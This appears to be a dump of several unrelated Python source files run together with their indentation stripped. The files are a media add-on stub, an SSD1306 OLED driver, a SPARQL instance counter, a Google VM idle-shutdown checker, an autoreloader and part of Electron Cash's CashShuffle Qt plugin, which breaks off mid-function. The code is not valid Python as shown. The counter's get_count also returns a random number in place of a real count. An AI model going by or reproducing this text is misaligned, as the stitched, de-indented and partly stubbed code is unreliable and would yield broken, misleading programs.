PluginAbsPath = os.path.dirname(os.path.abspath(__file__))
PLog('PluginAbsPath: ' + PluginAbsPath)
PLog('Addon: Start')
if __name__ == '__main__':
try:
router(sys.argv[2])
except Exception as e:
msg = str(e)
PLog('network_error: ' + msg)
|
main.py
|
#!/usr/bin/env python3
## SMBus-SSD1306 by portasynthinca3, 2021
## SSD1306 driver based on thom_tl's C++ code
## Licensed under WTFPL
##
## Read README.md for instructions!
from smbus import SMBus
from PIL import Image, ImageDraw
from threading import Thread
from time import time
import dbus
from pynput import keyboard
import os, sys
from screens import Screen
from config import *
import cv2, numpy
class SSD1306Vals:
CMD_PREFIX = 0x00
DATA_PREFIX = 0x40
MEMORY_MODE = 0x20
COL_ADDR = 0x21
PAGE_ADDR = 0x22
DISABLE_SCROLL = 0x2E
SET_START_LINE = 0x40
SET_CONTRAST = 0x81
SET_CHARGE_PUMP = 0x8D
SET_SEGMENT_REMAP = 0xA0
DISPLAY_VRAM = 0xA4
DISPLAY_FORCE_WHITE = 0xA5
DISPLAY_NORMAL = 0xA6
MULTIPLEX_RATIO = 0xA8
DISPLAY_OFF = 0xAE
DISPLAY_ON = 0xAF
SET_COM_SCAN_DIR = 0xC8
SET_DISPLAY_OFFSET = 0xD3
SET_DISPLAY_CLK_DIV = 0xD5
SET_PRECHARGE_PERIOD = 0xD9
SET_COMPINS = 0xDA
SET_VCOM_LEVEL = 0xDB
class SSD1306:
def __init__(self, bus=0, addr=0x3C):
# create interfacing objects
self.bus = SMBus(bus)
self.addr = addr
self.fb = bytearray([0] * (128 * 64 // 8))
# create PIL objects
self.img = Image.new("1", (128, 64), 0)
self.draw = ImageDraw.Draw(self.img)
def cmd(self, cmd, *args):
self.bus.write_i2c_block_data(self.addr, SSD1306Vals.CMD_PREFIX, [cmd] + list(args))
def data(self, data):
self.bus.write_i2c_block_data(self.addr, SSD1306Vals.DATA_PREFIX, list(data))
def flip(self):
# convert PIL image data into framebuffer data
for coord, pix in enumerate(self.img.getdata()):
x, y = coord % 128, coord // 128
idx, shift = x + ((y // 8) * 128), y & 0x7
if pix == 1:
self.fb[idx] |= 1 << shift
else:
self.fb[idx] &= ~(1 << shift)
# write framebuffer
self.cmd(SSD1306Vals.PAGE_ADDR, 0, 0xFF)
self.cmd(SSD1306Vals.COL_ADDR, 0, 127)
for i in range(0, 128 * 64 // 8, 8):
self.data(self.fb[i : i+8])
def power(self, val):
self.cmd(SSD1306Vals.DISPLAY_ON if val else SSD1306Vals.DISPLAY_OFF)
def init(self):
self.cmd(SSD1306Vals.DISPLAY_OFF)
self.cmd(SSD1306Vals.SET_DISPLAY_CLK_DIV, 0x80) # suggested ratio
self.cmd(SSD1306Vals.MULTIPLEX_RATIO, 63) # height - 1
self.cmd(SSD1306Vals.SET_DISPLAY_OFFSET, 0)
self.cmd(SSD1306Vals.SET_START_LINE | 0)
self.cmd(SSD1306Vals.SET_CHARGE_PUMP, 0x14)
self.cmd(SSD1306Vals.MEMORY_MODE, 0)
self.cmd(SSD1306Vals.SET_SEGMENT_REMAP | 1)
self.cmd(SSD1306Vals.SET_COM_SCAN_DIR)
self.cmd(SSD1306Vals.SET_COMPINS, 0x12)
# drive the display at a lower contrast to prevent burnout
# remember, this poor panel is going to be running 24/7!
# "normal" value: 0xC8
self.cmd(SSD1306Vals.SET_CONTRAST, 0x00)
self.cmd(SSD1306Vals.SET_PRECHARGE_PERIOD, 0xF1)
self.cmd(SSD1306Vals.SET_VCOM_LEVEL, 0x40)
self.cmd(SSD1306Vals.DISPLAY_VRAM)
self.cmd(SSD1306Vals.DISPLAY_NORMAL)
self.cmd(SSD1306Vals.DISABLE_SCROLL)
self.cmd(SSD1306Vals.DISPLAY_ON)
self.flip()
forced_screen, screen_fixed = -1, False
screen_id = 0
screen_start = time()
screens = []
capture_frames, capturing = [], False
def force_screen(i):
global forced_screen
forced_screen = i
def fix_screen():
global screen_fixed
screen_fixed = not screen_fixed
def start_capture():
global capturing, capture_frames
capture_frames = []
capturing = True
print("capture started")
def stop_capture():
global capturing, capture_frames
capturing = False
if len(capture_frames) == 0:
return
# get the average fps
last = capture_frames[0][0]
delta = []
for t, _ in capture_frames:
delta.append(t - last)
last = t
delta = delta[1:]
fps = len(delta) / sum(delta)
print(f"calculated fps {fps}, {len(capture_frames)} total frames")
# create a video writer
writer = cv2.VideoWriter(
os.path.join(os.path.expanduser(VIDEO_PATH), "ssd1306_capture.mp4"),
cv2.VideoWriter_fourcc("m", "p", "4", "v"),
fps, (512, 256)
)
# convert all frames to CV format
for _, frame in capture_frames:
frame = cv2.resize(frame, (512, 256), interpolation=cv2.INTER_NEAREST)
writer.write(frame)
writer.release()
print("capture saved")
def toggle_capture():
global capturing
capturing = not capturing
if capturing:
start_capture()
else:
stop_capture()
def drawing_thread(disp: SSD1306):
global screen_id, screen_start, forced_screen, capturing, capture_frames
# init state
screens = [x(disp.draw) for x in Screen.__subclasses__()]
# add hotkeys
hotkeys = {
"<ctrl>+<alt>+f": fix_screen,
"<ctrl>+<alt>+c": toggle_capture
}
for i in range(1, len(screens) + 1):
def _ctx_preserve(x):
hotkeys[f"<ctrl>+<alt>+{i}"] = lambda: force_screen(x - 1)
_ctx_preserve(i)
for s in screens:
hotkeys.update(s.register_hotkeys())
keyboard.GlobalHotKeys(hotkeys).start()
while True:
# update screens
for s in screens:
s.update()
# repaint screen
skip = False
disp.draw.rectangle((0, 0, 127, 63), fill=0)
skip = screens[screen_id].render()
if skip == None: skip = False
if screen_fixed: skip = False
# switch screens every SWITCH_PERIOD seconds
# or if there's nothing to display on the current one
if skip or (not screen_fixed and time() - screen_start >= SCREEN_SWITCH_PERIOD):
screen_id += 1
screen_id %= len(screens)
screen_start = time()
if forced_screen >= 0:
screen_id = forced_screen
forced_screen = -1
screen_start = time()
# draw a rectangle in the top right corner to indicate that the screen is fixed
if screen_fixed:
disp.draw.rectangle((123, 0, 127, 4), fill=1)
if not skip:
# save capture data
if capturing:
capture_frames.append((time(), numpy.array(disp.img.convert("RGB"))))
# transfer data to the display
disp.flip()
if __name__ == "__main__":
display = SSD1306(I2C_ADAPTER, SSD1306_ADDR)
display.init()
# if there's a "blank" argument, clear GDDRAM, power the display down and exit
if "blank" in sys.argv:
display.flip()
display.power(False)
exit()
thr = Thread(target=drawing_thread, args=(display,), name="Drawing thread")
thr.start()
thr.join()
|
InstanceCounter.py
|
from .SparqlInterface.src.ClientFactory import make_client
from .SparqlInterface.src.Interfaces.AbstractClient import AbstractClient
from .SQLiteStore.InstanceCountStore import InstanceCountStore
from .PickleStore.PickleStore import PickleStore
from .FileStore.FileStore import FileStore
from .Utilities.Logger import log
from .Utilities.Utilities import log_progress
from .NTripleLineParser.src.NTripleLineParser import NTripleLineParser
from sqlite3 import IntegrityError
from datetime import datetime
import gevent
import random
def get_count(in_type=None, server=None, store=None):
"""
:param in_type:
:param server:
:type server: AbstractClient
:param store:
:type store: InstanceCountStore
:return:
"""
#return server.count_instances(in_type)
r = random.randint(0, 100000)
return r
class InstanceCounter(object):
def __init__(self, server=None, user=None, password=None, n_processes=None, sqlite_db='./data/instance_count.db',
log_level="INFO"):
log.setLevel(log_level)
self.nt_parser = NTripleLineParser(" ")
#self.__store = FileStore("../instance_counts/")
#self.__store = InstanceCountStore(sqlite_db)
self.__store = PickleStore()
self.__server = make_client(server, user, password)
self.number_of_processes = n_processes
def count_all_instances(self, in_file=None):
cur_time = datetime.now()
if in_file:
log.info("Counting with classes from file")
self.use_file_for_classes(in_file)
else:
log.info("Counting with classes from service")
self.use_service_for_classes()
log.info("Done in: " + str(datetime.now() - cur_time))
def use_file_for_classes(self, f):
with open(f) as input_file:
threads = []
tmp_classes = set()
for line_num, line in enumerate(input_file):
triple = self.nt_parser.get_triple(line)
if not triple:
continue
log_progress(line_num, 100)
tmp_classes.add(triple['subject'])
tmp_classes.add(triple['object'])
if len(tmp_classes) >= self.number_of_processes-1:
threads = [gevent.spawn(self.__get_count, t) for t in tmp_classes]
tmp_classes = set()
gevent.joinall(threads)
for t in threads:
if hasattr(t, 'value') and type(t.value) is tuple:
try:
self.__store.store_instance_count(t.value[0], t.value[1])
except IntegrityError as e:
pass
threads = []
if len(tmp_classes) > 0:
gevent.joinall(threads)
for t in threads:
if hasattr(t, 'value') and type(t.value) is tuple:
try:
self.__store.store_instance_count(t.value[0], t.value[1])
except IntegrityError as e:
pass
self.__store.dump("data/instance_count.data")
def use_service_for_classes(self):
log.critical("Counting with classes from service currently not supported.")
pass
def __get_count(self, in_type):
return in_type, self.__server.count_instances(in_type)
# def __spawn_daemon(self, target, kwargs):
# # Todo Event based?
# # Check every 0.1 seconds if we can continue
# if hasattr(self, "processManager"):
# while not self.processManager.has_free_process_slot():
# time.sleep(0.1)
#
# p = Process(target=target, kwargs=kwargs)
# p.daemon = True
# if hasattr(self, "processManager"):
# try:
# self.processManager.add(p)
# except OccupiedError as e:
# log.critical(e)
# return 2
# else:
# p.start()
# else:
# p.start()
|
idle_shutdown.py
|
"""
Copyright 2019, Institute for Systems Biology
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pandas as pd
import glob
import datetime
import sys
import threading
import subprocess as sub
# import os
import re
import time
from idle_checker import log_a_point
"""
Call this from a daemon process that run this every X minutes. Decides whether or not to
shutdown an inactive VM running a Jupyter Notebook Server on a Google VM. Steps:
1) Check the last X hours of activity logs to see if the machine has been active. Have
accumlated empirical stats on what consistitutes an idle VM, where there is e.g. basal
network activity no matter what. Note those thresholds will be exceeded at least once a
day by Google VM maintenance logging, etc. That is not accounted for.
2) Previous logs might be ~10 minutes old. If we pass the first test, do a final check
of new Stackdriver metrics to see if there is recent activity.
3) User might still be starting to use the machine again in the last minute or two. If we
pass the first two checks, run two processes for X seconds in parallel to check TCP traffic
off the server port, and to check CPU usage of all (first generation only!) child processes
of the Notebook server.
4) If all previous checks indicate a shutdown is warranted, return True, else return False.
"""
def do_a_type(full_frame, tag, subtag, val_type, start_stamp, end_stamp, thresh):
"""
Decide if the specified type can be considered active during the given time period
"""
df_sb = full_frame.loc[full_frame['Type'] == tag]
df_sb.Time.str.replace(r'(\d+)-(\d+)-(\d+)-(.+)', r'\1-\2-\3 \4')
df_sb = df_sb.astype({"Time": 'datetime64', "Value": val_type})
df_sb.rename(columns={"Value": subtag}, inplace=True)
df_sb.set_index("Time", inplace=True)
dfsl = df_sb.loc[start_stamp:end_stamp]
not_idle = dfsl[subtag].max() > thresh
return not_idle
def pull_from_logs(home_dir, log_dir):
"""
Pull in all the logs into a pandas data frame. Note the way the logging is done, multiple copies
of the same time stamp can appear in the log
"""
full_glob = "{}/{}/{}".format(home_dir, log_dir, '@4*.s')
current_file = "{}/{}/{}".format(home_dir, log_dir, 'current')
fgs = glob.glob(full_glob)
fgs.append(current_file)
uniq_lines = {}
for use_file_name in fgs:
with open(use_file_name, 'r') as readfile:
for line in readfile:
split_line = line.rstrip('\n').split()
sub_line = ' '.join(split_line[2:5])
uniq_lines[sub_line] = tuple(split_line[2:5])
tuple_list = []
for key in sorted(uniq_lines):
tuple_list.append(uniq_lines[key])
all_types = pd.DataFrame.from_records(tuple_list, columns=["Type", "Time", "Value"])
return all_types
def pull_from_list(series_list):
"""
Pull in all list entries into a pandas data frame. Note the way the logging is done, multiple copies
of the same time stamp can appear in the log. Note also that coming from a list, we do NOT have a log
time stamp to worry about in position 1
"""
uniq_lines = {}
for line in series_list:
split_line = line.rstrip('\n').split()[1:4]
uniq_lines[line] = tuple(split_line)
tuple_list = []
for key in sorted(uniq_lines):
tuple_list.append(uniq_lines[key])
all_types = pd.DataFrame.from_records(tuple_list, columns=["Type", "Time", "Value"])
return all_types
def are_we_busy(all_types, window_hours, idle_thresh):
"""
Decide if machine is busy based upon several measurements
"""
now = time.time()
start_stamp = now - (60 * 60 * window_hours)
now_st = datetime.datetime.fromtimestamp(now).strftime('%Y-%m-%d %H:%M:%S')
start_st = datetime.datetime.fromtimestamp(start_stamp).strftime('%Y-%m-%d %H:%M:%S')
# print("now {} type {} stamp {}".format(now, type(now), now_st))
not_idle_sb = do_a_type(all_types, 'network/sent_bytes_count', 'sent_bytes_count', 'int',
start_st, now_st, idle_thresh['sent_bytes_count'])
not_idle_cb = do_a_type(all_types, 'network/received_bytes_count', 'received_bytes_count', 'int',
start_st, now_st, idle_thresh['received_bytes_count'])
not_idle_wb = do_a_type(all_types, 'disk/write_bytes_count', 'write_bytes_count', 'int',
start_st, now_st, idle_thresh['write_bytes_count'])
not_idle_wo = do_a_type(all_types, 'disk/write_ops_count', 'write_ops_count', 'int',
start_st, now_st, idle_thresh['write_ops_count'])
not_idle_rb = do_a_type(all_types, 'disk/read_bytes_count', 'read_bytes_count', 'int',
start_st, now_st, idle_thresh['read_bytes_count'])
not_idle_ro = do_a_type(all_types, 'disk/read_ops_count', 'read_ops_count', 'int',
start_st, now_st, idle_thresh['read_ops_count'])
not_idle_ut = do_a_type(all_types, 'cpu/utilization', 'utilization', 'float64',
start_st, now_st, idle_thresh['utilization'])
keep_alive = not_idle_sb or not_idle_cb or not_idle_wb or not_idle_wo or not_idle_rb or not_idle_ro or not_idle_ut
return keep_alive
def tcp_says_idle(check_secs, port_num, thresh, answer):
"""
Check traffic on the jupyter notebook server port. Note there are heartbeat packets even if nobody
is at the keyboard; thresh should take this into account (empirical: > 100 means something is happening
"""
am_idle = True
#
# We only get away with this as a regular user is because everybody can sudo on a Google VM:
#
p = sub.Popen(('sudo', 'timeout', str(check_secs), 'tcpdump', '-l', 'port', port_num), stdout=sub.PIPE, stderr=sub.DEVNULL)
for line in iter(p.stdout.readline, b''):
pack_val_str = re.sub('.*length', '', line.rstrip().decode("utf-8")).strip()
if pack_val_str and (int(pack_val_str) > thresh):
am_idle = False
p.wait() # to get rid of defunct process. Since we know it is done, it will not pause
answer[0] = am_idle
return
def top_says_idle(check_secs, thresh, home_dir, answer):
"""
Check cpu usage for all processes that are children of the process listening on the jupyter notebook
server port. Uses top, so tiny cpu % may not appear.
"""
am_idle = True
for i in range(0, check_secs):
p = sub.Popen(['sudo', '{}/bin/cpuLogger.sh'.format(home_dir)], stdout=sub.PIPE)
for line in iter(p.stdout.readline, b''):
cpu_val_str = line.rstrip().decode("utf-8").split()[8]
try:
cpu_val = float(cpu_val_str)
except ValueError:
# print("cpu not a float %s\n" % cpu_val_str)
continue
if cpu_val > thresh:
am_idle = False
p.wait() # to get rid of defunct process
if not am_idle:
answer[0] = am_idle
return
time.sleep(1)
answer[0] = am_idle
return
def shutdown_decision(home_dir, log_dir, window_hours, gcp_project_id, instance_name, port_num):
#
# Based on empirical observations of lull times, values above these indicate the
# machine is not idle. Note that running *this job* seems to bump the utilization up to
# 0.027 - 0.033 every fourth and fifth minute. Otherwise it appears to be less than 0.01.
# If this turns out to be a problem, we could filter those points out. Or we could take the
# average usage and see if it is exceeded.
#
idle_thresh = {
'sent_bytes_count': 15000,
'received_bytes_count': 90000,
'write_bytes_count': 250000,
'write_ops_count': 30,
'read_bytes_count': 10,
'read_ops_count': 10,
'utilization': 0.036
}
interval_sec = 600
final_secs = 60
tcp_thresh = 100
final_cpu = 0.0
#
# First decision is to see if we consider ourselves idle over the last X hours. If we are active, we are done
#
all_types = pull_from_logs(home_dir, log_dir)
if are_we_busy(all_types, window_hours, idle_thresh):
# print("last hour busy")
return False
#
# If we are idle in the long term, check to see if we have been idle recently. The long-term logging
# may not have run for the last several minutes:
#
series_list = log_a_point(gcp_project_id, instance_name, interval_sec, False)
all_types = pull_from_list(series_list)
if are_we_busy(all_types, window_hours, idle_thresh):
# print("recently busy")
return False
#
# If the latest data says we are idle, then we monitor port usage for the server, and top data for
# CPU usage for every child process of the server to see if we are idle. Even mre extreme, we
# *could* attach strace to the processes to see if they are doing anything at all. For now, let's
# not do that
tcp_answer = [False]
cpu_answer = [False]
t1 = threading.Thread(target = tcp_says_idle, args=(final_secs, port_num, tcp_thresh, tcp_answer))
t2 = threading.Thread(target=top_says_idle, args=(final_secs, final_cpu, home_dir, cpu_answer))
t1.start()
t2.start()
t1.join()
t2.join()
# print("recent tcp %s\n" % tcp_answer[0])
# print("recent cpu %s\n" % cpu_answer[0])
return tcp_answer[0] or cpu_answer[0]
def main(args):
home_dir = args[1]
log_dir = args[2]
window_hours = int(args[3])
gcp_project_id = args[4]
instance_name = args[5]
port_num = args[6]
do_shutdown = shutdown_decision(home_dir, log_dir, window_hours, gcp_project_id, instance_name, port_num)
print(do_shutdown)
# return do_shutdown
if __name__ == "__main__":
main(sys.argv)
|
autoreload.py
|
# -*- coding: utf-8 -*-
'''
# =============================================================================
# FileName: autoreload.py
# Desc: get some referance from django
# Author: ifkite
# Email: holahello@163.com
# HomePage: http://github.com/ifkite
# python version: 2.7.10
# LastChange: 2017-07-30 22:27:38
# =============================================================================
'''
import sys
import os
import signal
import threading
import time
def clean_filenames(filenames):
"""
"""
filelist = []
for filename in filenames:
# if not filename:
# continue
# https://stackoverflow.com/questions/8822335/what-do-the-python-file-extensions-pyc-pyd-pyo-stand-for
if filename.endswith(".pyc") or filename.endswith(".pyo"):
filename = filename[:-1]
if os.path.exists(filename):
filelist.append(filename)
return filelist
def gen_filenames():
modules = sys.modules.values()
return clean_filenames([module.__file__ for module in modules if hasattr(module, '__file__')])
def walk_filenames():
filelist = []
start_dir = os.path.dirname(os.path.abspath(__file__))
for dir_path, dirs, filenames in os.walk(start_dir):
filelist.extend([
os.path.join(dir_path, filename)
for filename in filenames
if filename.endswith('py') or filename.endswith('json')
])
return filelist
_mtimes = {}
FILE_CHANGED = 3
def is_file_changed():
for filename in walk_filenames():
stat = os.stat(filename)
mtime = stat.st_mtime
if filename not in _mtimes:
_mtimes[filename] = mtime
continue
if mtime != _mtimes[filename]:
_mtimes.clear()
return True
return False
def check_file_changed():
while True:
time.sleep(1)
if is_file_changed():
os.kill(os.getpid(), signal.SIGKILL)
def wait_child(pid):
while True:
try:
# wait for child process
wpid, sts = os.waitpid(pid, 0)
except KeyboardInterrupt:
# handle exceptions when parent is waiting
handle_parent_exit(pid)
# if child process stopped
if os.WIFSTOPPED(sts):
continue
# if receive keybord interuption or kill signal
elif os.WIFSIGNALED(sts):
return sts
# seems not work
elif os.WIFEXITED(sts):
return sts
else:
raise "Not stopped, signaled or exited???"
def handle_child_exit(signal_code):
# parent will fork a new child
if signal_code == signal.SIGKILL:
pass
else:
sys.exit()
def handle_parent_exit(pid):
os.kill(pid, signal.SIGKILL)
sys.exit()
def restart_reloader():
while True:
args = [sys.executable] + sys.argv
child_environ = os.environ.copy()
pid = os.fork()
# child process
if not pid:
child_environ["RUN_MAIN"] = "true"
# may exit with FILE_CHANGED code
# in fact, call itself
os.execve(sys.executable, args, child_environ)
# parent process
else:
signal_code = wait_child(pid)
handle_child_exit(signal_code)
# sample
# from wsgiref.simple_server import make_server
# def run():
# httpd = make_server(host='', port=8848, app=app)
# httpd.serve_forever()
# if __name__ == '__main__':
# autoreload(run)
def autoreload(func, *args, **kwargs):
# child process
if os.environ.get("RUN_MAIN") == "true":
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.start()
check_file_changed()
# parent process
else:
restart_reloader()
|
qt.py
|
#!/usr/bin/env python3
#
# Cash Shuffle - CoinJoin for Bitcoin Cash
# Copyright (C) 2018-2019 Electron Cash LLC
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import json
import copy
import socket
import time
import threading
import queue
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash.plugins import BasePlugin, hook
from electroncash.i18n import _
from electroncash.util import print_error, profiler, PrintError, Weak, format_satoshis_plain, finalization_print_error
from electroncash.network import Network
from electroncash.address import Address
from electroncash.transaction import Transaction
from electroncash.simple_config import SimpleConfig, get_config
from electroncash.wallet import Abstract_Wallet
from electroncash_gui.qt.util import EnterButton, CancelButton, Buttons, CloseButton, HelpLabel, OkButton, rate_limited, ColorScheme, destroyed_print_error, AppModalDialog
from electroncash_gui.qt.password_dialog import PasswordDialog
from electroncash_gui.qt.main_window import ElectrumWindow
from electroncash_gui.qt.amountedit import BTCAmountEdit
from electroncash_gui.qt.utils import FixedAspectRatioSvgWidget
from .client import BackgroundShufflingThread, ERR_SERVER_CONNECT, ERR_BAD_SERVER_PREFIX, MSG_SERVER_OK
from .comms import query_server_for_stats, verify_ssl_socket
from .conf_keys import ConfKeys # config keys per wallet and global
from .coin_utils import CoinUtils
def is_coin_busy_shuffling(window, utxo_or_name):
''' Convenience wrapper for BackgroundShufflingThread.is_coin_busy_shuffling '''
bp = getattr(window, 'background_process', None)
return bool(bp and bp.is_coin_busy_shuffling(utxo_or_name))
def network_callback(window, event, *args):
''' This gets called in the network thread. It should just emit signals to GUI
if it is to do any GUI work. '''
if event == 'new_transaction':
if len(args) == 2 and hasattr(window, 'wallet') and args[1] is window.wallet and args[0]:
window._shuffle_sigs.tx.emit(window, args[0])
def my_custom_item_setup(utxo_list, item, utxo, name):
if not hasattr(utxo_list.wallet, 'is_coin_shuffled'):
return
prog = utxo_list.in_progress.get(name, "")
frozenstring = item.data(0, utxo_list.DataRoles.frozen_flags) or ""
is_reshuffle = name in utxo_list.wallet._reshuffles
is_slp = 's' in frozenstring
u_value = utxo['value']
if is_slp:
item.setText(5, _("SLP Token"))
elif not is_reshuffle and utxo_list.wallet.is_coin_shuffled(utxo): # already shuffled
item.setText(5, _("Shuffled"))
elif not is_reshuffle and utxo['address'] in utxo_list.wallet._shuffled_address_cache: # we hit the cache directly as a performance hack. we don't really need a super-accurate reply as this is for UI and the cache will eventually be accurate
item.setText(5, _("Shuffled Addr"))
elif not prog and ("a" in frozenstring or "c" in frozenstring):
item.setText(5, _("Frozen"))
elif u_value >= BackgroundShufflingThread.UPPER_BOUND: # too big
item.setText(5, _("Too big"))
elif u_value < BackgroundShufflingThread.LOWER_BOUND: # too small
item.setText(5, _("Too small"))
elif utxo['height'] <= 0: # not_confirmed
if is_reshuffle:
item.setText(5, _("Unconfirmed (reshuf)"))
else:
item.setText(5, _("Unconfirmed"))
elif utxo['coinbase']: # we disallow coinbase coins unconditionally -- due to miner feedback (they don't like shuffling these)
item.setText(5, _("Coinbase"))
elif (u_value >= BackgroundShufflingThread.LOWER_BOUND
and u_value < BackgroundShufflingThread.UPPER_BOUND): # queued_labels
window = utxo_list.parent
if (window and window.background_process and utxo_list.wallet.network
and utxo_list.wallet.network.is_connected()):
if window.background_process.get_paused():
item.setText(5, _("Paused"))
else:
if is_reshuffle:
item.setText(5, _("In queue (reshuf)"))
else:
item.setText(5, _("In queue"))
else:
item.setText(5, _("Offline"))
if prog == 'in progress': # in progress
item.setText(5, _("In progress"))
elif prog.startswith('phase '):
item.setText(5, _("Phase {}").format(prog.split()[-1]))
elif prog == 'wait for others': # wait for others
item.setText(5, _("Wait for others"))
elif prog.startswith("got players"): # got players > 1
num, tot = (int(x) for x in prog.rsplit(' ', 2)[-2:])
txt = "{} ({}/{})".format(_("Players"), num, tot)
item.setText(5, txt)
elif prog == "completed":
item.setText(5, _("Done"))
def my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected):
''' Adds CashShuffle related actions to the utxo_list context (right-click)
menu '''
wallet = window.wallet
shuffled_selected = [name for name,flags in selected.items()
if (not flags
and wallet.is_coin_shuffled(CoinUtils.coin_name_to_dict(name))
and name not in wallet._reshuffles)]
reshuffles_selected = [name for name in selected if name in wallet._reshuffles]
menu.addSection(_('CashShuffle'))
def on_reshuffle():
wallet._reshuffles.update(set(shuffled_selected))
utxo_list.update()
def on_cancel_reshuffles():
wallet._reshuffles.difference_update(set(reshuffles_selected))
utxo_list.update()
len_shufs, len_reshufs = len(shuffled_selected), len(reshuffles_selected)
if len_shufs:
if len_shufs == 1:
action = menu.addAction(_('Reshuffle Coin'), on_reshuffle)
else:
action = menu.addAction(_('Reshuffle {} Shuffled').format(len_shufs), on_reshuffle)
if len_reshufs:
if len_reshufs == 1:
action = menu.addAction(_('Cancel Reshuffle'), on_cancel_reshuffles)
else:
action = menu.addAction(_('Cancel {} Reshuffles').format(len_reshufs), on_cancel_reshuffles)
def _make_label(window, tot, shufamt, chg, fee, scale):
is_dusty_fee = not chg and fee - BackgroundShufflingThread.FEE > 0
# satoshis -> display format
tot, shufamt, chg = window.format_amount(tot), window.format_amount(shufamt), window.format_amount(chg) if chg else ''
chgtxt = " + {} ".format(chg) if chg else " "
# Note it's important that the "Shuffle" prefix not be translated because we use it elsewhere
# in the filter shuffle history callback... and it's also a "proper name" :)
return ( "Shuffle" + (" {} {} {} {}{}(-{} sats {})"
.format(tot, window.base_unit(),
BackgroundShufflingThread.SCALE_ARROW_DICT.get(scale, BackgroundShufflingThread.SCALE_ARROW_UNKNOWN),
shufamt, chgtxt, fee, _("fee") if not is_dusty_fee else _("dusty fee")
)
)
)
def update_coin_status(window, coin_name, msg):
if getattr(window.utxo_list, "in_progress", None) is None:
return
#print_error("[shuffle] wallet={}; Coin {} Message '{}'".format(window.wallet.basename(), coin_name, msg.strip()))
prev_in_progress = window.utxo_list.in_progress.get(coin_name)
new_in_progress = prev_in_progress
msg = msg or '' # force str
coin_name = coin_name or '' # force str
if coin_name not in ("MAINLOG", "PROTOCOL"):
if msg.startswith("Player"):
if "get session number" in msg:
new_in_progress = 'wait for others'
elif 'joined the pool' in msg:
try:
num = int(msg.split(' ', 2)[1])
if num > 1:
# got more players than just self
new_in_progress = 'got players {} {}'.format(num, window.background_process.poolSize)
except (ValueError, IndexError):
pass
elif "begins CoinShuffle protocol" in msg:
new_in_progress = 'in progress'
elif "reaches phase" in msg:
pos = msg.find("reaches phase")
parts = msg[pos:].split(' ', 2)
try:
phase = int(parts[2])
new_in_progress = 'phase {}'.format(phase)
except (IndexError, ValueError):
pass
elif msg.endswith("complete protocol"):
new_in_progress = "completed" # NB: these don't leak. they eventually get cleaned up by the 'forget ' command from the background thread after some time
elif msg.startswith("Error"):
new_in_progress = None # flag to remove from progress list
if ERR_SERVER_CONNECT in msg or ERR_BAD_SERVER_PREFIX in msg:
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif msg.startswith("Blame") and "insufficient" not in msg and "wrong hash" not in msg:
new_in_progress = None
elif msg.startswith("shuffle_txid:"): # TXID message -- call "set_label"
words = msg.split()
label = _("CashShuffle") # fallback on parse error
if len(words) >= 2:
txid = words[1]
try:
tot, shufamt, chg, fee, scale = [int(w) for w in words[2:7]] # parse satoshis
label = _make_label(window, tot, shufamt, chg, fee, scale)
except (IndexError, ValueError, TypeError) as e:
# Hmm. Some sort of parse error. We'll label it 'CashShuffle'
window.print_error("*** WARNING: Could not parse shuffle_txid message:", str(e), msg)
window.wallet.set_label(txid, label)
Plugin._increment_shuffle_counter(window)
window.update_wallet()
elif msg.startswith("add_tentative_shuffle:"):
# add_tentative_shuffle: utxo outaddr tot scale chg fee
# This is a mechanism as a workaround for issue #70 -- it's possible for last player to delay and cause other players to miss the txid.
try:
words = msg.split()
utxo, addr = words[1:3]
tot, shufamt, chg, fee, scale = [int(x) for x in words[3:8]] # parse satoshis
window._shuffle_tentative[utxo] = (addr, tot, shufamt, chg, fee, scale) # remember this tentative shuffle so we can generate a label for it if we see a matching tx come in later
except (IndexError, ValueError, TypeError) as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse add_tentative_shuffle message:", str(e), msg)
elif msg.startswith("del_tentative_shuffle:"):
try:
utxo = msg.split()[1]
window._shuffle_tentative.pop(utxo, None) # tolerate del commands for missing values from dict
except IndexError as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse del_tentative_shuffle message:", str(e), msg)
if not msg.startswith("Error") and not msg.startswith("Exit"):
window.cashshuffle_set_flag(0) # 0 means ok
elif new_in_progress != 'completed' and prev_in_progress == new_in_progress: # "Exit" or "Error"
# thread exit or error without completing protocol, set status back to 'in queue'
# -- fixes wrong status of 'in progress' and 'waiting for others' being shown in UI for dead threads
new_in_progress = None
else:
if msg == "stopped":
window.utxo_list.in_progress.clear(); new_in_progress = prev_in_progress = None
elif msg.startswith("forget "):
words = msg.strip().split()
prev_in_progress = 1; new_in_progress = None; coin_name = words[-1] # force the code below to pop the coin that we were asked to forget from the status dict
elif ERR_SERVER_CONNECT in msg:
new_in_progress = None # flag to remove from progress list
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif MSG_SERVER_OK in msg:
new_in_progress = None
window.cashshuffle_set_flag(0) # server is ok now.
if prev_in_progress != new_in_progress:
if new_in_progress is None:
